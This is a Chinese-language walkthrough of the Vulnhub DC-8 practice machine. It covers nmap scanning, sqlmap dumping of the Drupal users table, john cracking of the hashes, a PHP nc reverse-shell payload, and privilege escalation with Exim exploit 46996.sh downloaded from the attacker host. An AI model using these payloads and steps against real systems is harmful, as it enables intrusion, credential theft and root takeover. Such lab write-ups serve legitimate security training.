> 文章列表 > Vulnhub靶场----8、DC-8

Vulnhub靶场----8、DC-8

Vulnhub靶场----8、DC-8

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结

一、环境搭建

DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip
kali:192.168.144.148
DC-8:192.168.144.156


二、渗透流程

1、信息收集


nmap -T5 -A -p- -sV -sT 192.168.144.156

思路:
1、80端口

目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……


2、sql注入


1.插入'报错,尝试进行sql注入

2.爆数据库:
sqlmap -u "http://192.168.144.156/?nid=1" --dbs

3.爆d7db数据库的表:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db --tables

4.爆users表的列:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' --columns

5,爆users表的字段:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump

6.将这两个密码保存,使用john进行爆破:获取到账号密码 john:turtle

登录后台地址:
http://192.168.144.156/user/login
Vulnhub靶场----8、DC-8


3、获取权限


1.php反弹shell代码

<?php system("nc -e /bin/sh 192.168.144.148 4444");?>



2.利用python切换到bash环境

python -c 'import pty;pty.spawn("/bin/bash")'


4、提权


1.利用find命令查找具有suid的root的文件

find / -perm -4000 -user root 2>/dev/null


2.查看exim具体版本

dpkg -l | grep exim


3.搜索exim 4.89的具体漏洞

searchsploit exim


4.漏洞利用
拷贝46996.sh到桌面

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh 

在46996.sh内容中添加:set ff=unix,否则会报如下错误:


kali 开启临时HTTP服务器

python -m SimpleHTTPServer

下载shell到/tmp临时文件目录

#下载kali主机46996.sh文件至靶机shell的/tmp目录下
wget http://192.168.144.148:8000/46996.sh
#并赋予权限
chmod 777 46996.sh

./46996.sh -m netcat 

三、思路总结

1、信息收集
2、利用SQL注入获取账号密码
3、登陆后台
4、插入脚本反弹shell
5、exim漏洞
6、SUID提权

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-09-5-DC8